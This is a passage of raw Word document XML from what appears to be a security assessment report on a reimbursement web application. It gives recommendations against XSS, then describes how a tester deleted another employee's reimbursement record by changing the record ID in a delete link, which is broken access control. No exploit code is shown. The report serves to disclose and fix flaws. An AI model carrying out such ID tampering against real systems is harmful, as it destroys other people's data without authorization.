      <w:bookmarkStart w:id="129" w:name="_Toc93487307"/>
      <w:bookmarkStart w:id="130" w:name="_Toc93502884"/>
      <w:bookmarkStart w:id="131" w:name="_Toc93526920"/>
    </w:p>
    <w:p w14:paraId="13EA5A8B" w14:textId="7A8D7877" w:rsidR="00BA3A0D" w:rsidRDefault="00BA3A0D" w:rsidP="00020862">
      <w:r>
        <w:t xml:space="preserve">Such planned attack could lead to unknowing employers in the context of the web application to re-input their credentials </w:t>
      </w:r>
      <w:r w:rsidR="00A03A1C">
        <w:t>oblivious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that they are submitting their credentials to the attacker through phishing sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41666C7F" w14:textId="77777777" w:rsidR="00020862" w:rsidRDefault="00020862">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBE1D5B" w14:textId="137317D8" w:rsidR="00170CA0" w:rsidRDefault="00170CA0" w:rsidP="00836A40">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc94100251"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="101D3F68" w14:textId="1CF48BFC" w:rsidR="00FB501E" w:rsidRDefault="00025B9A" w:rsidP="0066593A">
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="009D33F0">
        <w:t xml:space="preserve"> combat against XSS attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the web application </w:t>
      </w:r>
      <w:r w:rsidR="00E901E4">
        <w:t xml:space="preserve">should deny all </w:t>
      </w:r>
      <w:r w:rsidR="00B16CC9">
        <w:t xml:space="preserve">untrusted data </w:t>
      </w:r>
      <w:r w:rsidR="00FB501E">
        <w:t>placed in the HTML document,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00481D38">
        <w:t>encode the data on output</w:t>
      </w:r>
      <w:r w:rsidR="00A01F7C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00986437">
        <w:t xml:space="preserve"> filter the input</w:t>
      </w:r>
      <w:r w:rsidR="00A01F7C">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00A968B7">
        <w:t xml:space="preserve">enable </w:t>
      </w:r>
      <w:r w:rsidR="00A01F7C">
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidR="00EE6A98">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F5211B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F97668">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00214166">
        <w:t xml:space="preserve">ntrusted data should not be placed into </w:t>
      </w:r>
      <w:r w:rsidR="0005734C">
        <w:t xml:space="preserve">HTML documents </w:t>
      </w:r>
      <w:r w:rsidR="004D4B33">
        <w:t>unless</w:t>
      </w:r>
      <w:r w:rsidR="00E85C4E">
        <w:t xml:space="preserve"> it is encoded</w:t>
      </w:r>
      <w:r w:rsidR="0034274E">
        <w:t>. The different encoding methods will be stated below</w:t>
      </w:r>
      <w:r w:rsidR="006F7645">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0270C1" w14:textId="7EA2468B" w:rsidR="00170CA0" w:rsidRDefault="00F97668" w:rsidP="0066593A">
      <w:r>
        <w:t>Firstly</w:t>
      </w:r>
      <w:r w:rsidR="00F74C1F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0027521D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00033972">
        <w:t xml:space="preserve">output data </w:t>
      </w:r>
      <w:r w:rsidR="000373CF">
        <w:t>should be encoded</w:t>
      </w:r>
      <w:r w:rsidR="00C436EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5FB3">
        <w:t xml:space="preserve">when it is </w:t>
      </w:r>
      <w:r w:rsidR="216C6E23">
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidR="57EA1A7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F92F31">
        <w:t>in the HTTP response</w:t>
      </w:r>
      <w:r w:rsidR="00803FAE">
        <w:t xml:space="preserve"> such as</w:t>
      </w:r>
      <w:r w:rsidR="00DE769B">
        <w:t xml:space="preserve"> ‘&lt;’ which becomes </w:t>
      </w:r>
      <w:r w:rsidR="00F22619">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>‘&amp;lt’ and ‘&gt;’ which becomes ‘&amp;gt’</w:t>
      </w:r>
      <w:r w:rsidR="003D0E2A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>. This</w:t>
      </w:r>
      <w:r w:rsidR="00F22619">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009143C2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">can help to prevent the </w:t>
      </w:r>
      <w:r w:rsidR="007829CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>script to be executed in the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DA302" w14:textId="42F4B91C" w:rsidR="00F840B7" w:rsidRDefault="003D0064" w:rsidP="0066593A">
      <w:r>
        <w:t xml:space="preserve">Secondly, </w:t>
      </w:r>
      <w:r w:rsidR="00816F60">
        <w:t xml:space="preserve">dynamic attributes </w:t>
      </w:r>
      <w:r w:rsidR="00BF3FA2">
        <w:t>such as ‘width’</w:t>
      </w:r>
      <w:r w:rsidR="00BF22BB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C17E7D">
        <w:t xml:space="preserve">should be quoted using </w:t>
      </w:r>
      <w:r w:rsidR="00443C4D">
        <w:t>‘&amp;</w:t>
      </w:r>
      <w:r w:rsidR="004E4D1C">
        <w:t xml:space="preserve">#x22’ and ‘&amp;#x27’ which represents </w:t>
      </w:r>
      <w:r w:rsidR="001F0448">
        <w:t xml:space="preserve">double quote </w:t>
      </w:r>
      <w:r w:rsidR="00B304E0">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004E4D1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F0448">
        <w:t xml:space="preserve">single quote </w:t>
      </w:r>
      <w:r w:rsidR="00B304E0">
        <w:t>respectively</w:t>
      </w:r>
      <w:r w:rsidR="004E4D1C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00593144">
        <w:t>This prevents the</w:t>
      </w:r>
      <w:r w:rsidR="00960B4C">
        <w:t xml:space="preserve"> quotes from being broken</w:t>
      </w:r>
      <w:r w:rsidR="003A56BA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E36B7" w14:textId="31EDC7B5" w:rsidR="005327CA" w:rsidRDefault="005327CA" w:rsidP="0066593A">
      <w:r>
        <w:t xml:space="preserve">Thirdly, </w:t>
      </w:r>
      <w:r w:rsidR="0088419F" w:rsidRPr="0088419F">
        <w:t>the user input should be filtered before uploading it into the database. The fil</w:t>
      </w:r>
      <w:r w:rsidR="00B95A63">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0088419F" w:rsidRPr="0088419F">
        <w:t>er should be based on the expected or valid input such as only accepting alphanumeric characters and rejecting any ‘&lt;’</w:t>
      </w:r>
      <w:r w:rsidR="00962BF0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0088419F" w:rsidRPr="0088419F">
        <w:t>‘&gt;’</w:t>
      </w:r>
      <w:r w:rsidR="00962BF0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0088419F" w:rsidRPr="0088419F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00962BF0">
        <w:t>‘;</w:t>
      </w:r>
      <w:r w:rsidR="0088419F" w:rsidRPr="0088419F">
        <w:t>’ in the input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D9A06" w14:textId="0E867A25" w:rsidR="00A01F7C" w:rsidRDefault="00A01F7C" w:rsidP="0066593A">
      <w:r>
        <w:t xml:space="preserve">Lastly, </w:t>
      </w:r>
      <w:r w:rsidR="00A968B7">
        <w:t xml:space="preserve">enabling </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Content Security Policy (CSP) </w:t>
      </w:r>
      <w:r w:rsidR="00B5577B">
        <w:t>through adding the Content-Security-Policy HTTP header to the web page</w:t>
      </w:r>
      <w:r w:rsidR="00FB5C52">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006B0733">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004466B6">
        <w:t>reduces or eliminates</w:t>
      </w:r>
      <w:r w:rsidR="0085172E">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="004466B6">
        <w:t>vectors</w:t>
      </w:r>
      <w:r w:rsidR="0085172E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C370A">
        <w:t>by which XSS can occur</w:t>
      </w:r>
      <w:r w:rsidR="00784C73">
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="001C16A9">
        <w:t>provides defense-in-depth</w:t>
      </w:r>
      <w:r w:rsidR="008C370A">
        <w:t xml:space="preserve"> by allowing the server administrator to spe</w:t>
      </w:r>
      <w:r w:rsidR="00222F85">
        <w:t>cify</w:t>
      </w:r>
      <w:r w:rsidR="008C370A">
        <w:t xml:space="preserve"> the domains </w:t>
      </w:r>
      <w:r w:rsidR="00222F85">
        <w:t xml:space="preserve">that the web application </w:t>
      </w:r>
      <w:r w:rsidR="00260517">
        <w:t xml:space="preserve">should consider </w:t>
      </w:r>
      <w:r w:rsidR="00EF7468">
        <w:t>as valid sources of executable scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF29E4" w14:textId="77777777" w:rsidR="005327CA" w:rsidRDefault="005327CA" w:rsidP="005327CA"/>
    <w:p w14:paraId="5126E5F5" w14:textId="77777777" w:rsidR="00B668C8" w:rsidRDefault="00B668C8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc93487308"/>
      <w:bookmarkStart w:id="134" w:name="_Toc93502885"/>
      <w:bookmarkStart w:id="135" w:name="_Toc93526921"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ED7A6" w14:textId="20F42472" w:rsidR="00100A07" w:rsidRDefault="00100A07" w:rsidP="00100A07">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc94100252"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Broken Access Control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="0FE4955F" w14:textId="77777777" w:rsidR="007E2582" w:rsidRDefault="007E2582" w:rsidP="007E2582">
      <w:r>
        <w:t>Broken Access Control occurs when a user can access resources in an unauthorized manner which, in this case, an Employee user was able to access and perform actions on other Employee’s reimbursement data by interacting with the web application via other means.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541551D2" w14:textId="7EE4486A" w:rsidR="008428C4" w:rsidRDefault="008428C4" w:rsidP="008428C4">
      <w:r>
        <w:t>This vulnerability impacts the availability</w:t>
      </w:r>
      <w:r w:rsidR="00DD5708">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>confidentiality</w:t>
      </w:r>
      <w:r w:rsidR="00DD5708">
        <w:t>, and potentially integrity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the reimbursement records. A user is able to delete another user’s reimbursement record, which affects the availability. A user is not only able to view the reimbursement record of another user but also sensitive information such as the password hash. Since the reimbursement records can be accessed by anyone, an attacker will be able to retrieve all the information stored in the reimbursement table. The information stored contains sensitive data that the attacker is able to use for further attacks such as gaining unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F282A10" w14:textId="77777777" w:rsidR="007E2582" w:rsidRPr="007E2582" w:rsidRDefault="007E2582" w:rsidP="007E2582"/>
    <w:p w14:paraId="18A02798" w14:textId="3DDCD8C8" w:rsidR="006A1B3F" w:rsidRDefault="007E1D0C" w:rsidP="006A1B3F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc94100253"/>
      <w:r>
        <w:t>Unauthorized Deletion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="258EAB6C" w14:textId="77777777" w:rsidR="002C3F9B" w:rsidRPr="00A46C7B" w:rsidRDefault="002C3F9B" w:rsidP="002C3F9B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C24B5" w14:textId="65CF8EC1" w:rsidR="006C10DD" w:rsidRDefault="006C10DD" w:rsidP="0066593A">
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidR="001D0C0F">
        <w:t>begin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003D4459">
        <w:t>the Employee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> User</w:t>
      </w:r>
      <w:r w:rsidR="003D4459">
        <w:t>, Erwin,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65377">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>reate</w:t>
      </w:r>
      <w:r w:rsidR="00AF1D74">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3852">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000529E0">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eimbursement </w:t>
      </w:r>
      <w:r w:rsidR="0096356B">
        <w:t xml:space="preserve">record </w:t>
      </w:r>
      <w:r>
        <w:t>as shown below.</w:t>
      </w:r>
      <w:r w:rsidR="001F55EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t xml:space="preserve">It is important to understand the interaction of the web buttons on the UI as intended with the code it executes. With that in mind, the Detail and Delete </w:t>
      </w:r>
      <w:r w:rsidR="004C725A">
        <w:t>buttons</w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t xml:space="preserve"> are of </w:t>
      </w:r>
      <w:r w:rsidR="00B47348">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t xml:space="preserve">most interest. The instructions issued by </w:t>
      </w:r>
      <w:r w:rsidR="00991710" w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve">the buttons </w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t>can be found</w:t>
      </w:r>
      <w:r w:rsidR="00991710" w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="004229FA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00991710" w:rsidRPr="00EA2FE9">
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t xml:space="preserve"> source</w:t>
      </w:r>
      <w:r w:rsidR="00991710" w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t>searching</w:t>
      </w:r>
      <w:r w:rsidR="00991710" w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> for ‘Detail’ and ‘Delete’</w:t>
      </w:r>
      <w:r w:rsidR="00991710">
        <w:t xml:space="preserve"> respectively as shown below. </w:t>
      </w:r>
      <w:r w:rsidR="001F55EC">
        <w:t xml:space="preserve">Using the developer tools in the </w:t>
      </w:r>
      <w:r w:rsidR="00C12A9D">
        <w:t>browser</w:t>
      </w:r>
      <w:r w:rsidR="005A7933">
        <w:t xml:space="preserve"> and analyzing the source code</w:t>
      </w:r>
      <w:r w:rsidR="00C12A9D">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="0063765F">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00C12A9D">
        <w:t xml:space="preserve">elete button </w:t>
      </w:r>
      <w:r w:rsidR="000248AF">
        <w:t xml:space="preserve">was revealed to be associated with a hyperlink </w:t>
      </w:r>
      <w:r w:rsidR="00215B02">
        <w:t>to delete the record.</w:t>
      </w:r>
      <w:r w:rsidR="00546C48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53479D30" w14:textId="743D440A" w:rsidR="00F64B18" w:rsidRDefault="00264262" w:rsidP="006948AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658314" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55D7593D" wp14:editId="15F9776B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1290257</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>900223</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3971749" cy="190733"/>
                <wp:effectExtent l="0" t="0" r="10160" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="121" name="Rectangle 121"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3971749" cy="1907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C27BDD">
              <v:rect id="Rectangle 121" style="position:absolute;margin-left:101.6pt;margin-top:70.9pt;width:312.75pt;height:1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C1EB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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D2540">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658308" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AAD490A" wp14:editId="3CD710ED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>857250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2245995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1776413" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="83" name="Rectangle 83"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1776413"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1EB339">
              <v:rect id="Rectangle 83" style="position:absolute;margin-left:67.5pt;margin-top:176.85pt;width:139.9pt;height:10.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286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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F64B18">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C17C673" wp14:editId="0E8913BF">
            <wp:extent cx="5943600" cy="2470068"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="18946412" name="Picture 18946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12" name="Picture 18946412" descr="A screenshot of a computer&#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6146"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2470068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C13B3" w14:textId="61EDAD3F" w:rsidR="00F64B18" w:rsidRDefault="00F64B18" w:rsidP="007E4F99">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The hyperlink is then copied </w:t>
      </w:r>
      <w:r w:rsidR="00ED509E">
        <w:t xml:space="preserve">with the </w:t>
      </w:r>
      <w:r w:rsidR="00762377">
        <w:t xml:space="preserve">ID at the back modified to 167 which references another user’s reimbursement </w:t>
      </w:r>
      <w:r w:rsidR="001949AE">
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidR="00762377">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F7C1D">
        <w:t xml:space="preserve"> In this case, </w:t>
      </w:r>
      <w:r w:rsidR="001E1EFB">
        <w:t>object ID 167 belongs to user FTK.</w:t>
      </w:r>
      <w:r w:rsidR="00341E57">
        <w:t xml:space="preserve"> When entered, no error or </w:t>
      </w:r>
      <w:r w:rsidR="00CC429F">
        <w:t xml:space="preserve">feedback regarding unauthorized access </w:t>
      </w:r>
      <w:r w:rsidR="00274386">
        <w:t>was shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB980B" w14:textId="1730AB6B" w:rsidR="00F64B18" w:rsidRDefault="00637EF6" w:rsidP="006948AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658309" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54656056" wp14:editId="1612F4AD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>400050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>133033</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1776413" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="119" name="Rectangle 119"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1776413"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58B1FB">
              <v:rect id="Rectangle 119" style="position:absolute;margin-left:31.5pt;margin-top:10.5pt;width:139.9pt;height:12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005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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F64B18">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D5F1801" wp14:editId="4C607743">
            <wp:extent cx="5943600" cy="433449"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="18946413" name="Picture 189464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13" name="Picture 18946413" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidenc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87040"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="433449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3678C81C" w14:textId="690AE323" w:rsidR="006D4EFD" w:rsidRDefault="006D4EFD">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6234FC53" w14:textId="25E56996" w:rsidR="00EA3741" w:rsidRDefault="00EA3741" w:rsidP="00EA3741">
      <w:r w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r>
        <w:t>seen,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004229FA">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>FTK</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> user reimbursement record was deleted in an un</w:t>
      </w:r>
      <w:r>
        <w:t>authorized</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2FE9">
        <w:t xml:space="preserve"> manner</w:t>
      </w:r>
      <w:r>
        <w:t>. This is highly dangerous as a script can be easily written by an attacker to enumerate and delete all records in the Reimbursement table.</w:t>
      </w:r>
      <w:r w:rsidR="00B4365B" w:rsidRPr="00B4365B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6051F2" w14:textId="672A9DB6" w:rsidR="006C10DD" w:rsidRDefault="00A55371" w:rsidP="00FA0243">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658318" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1656743F" wp14:editId="5382C0EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2457883</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1584893</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1776413" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="122" name="Rectangle 122"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1776413"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003BFA">
              <v:rect id="Rectangle 122" style="position:absolute;margin-left:193.55pt;margin-top:124.8pt;width:139.9pt;height:1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F523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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B4365B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
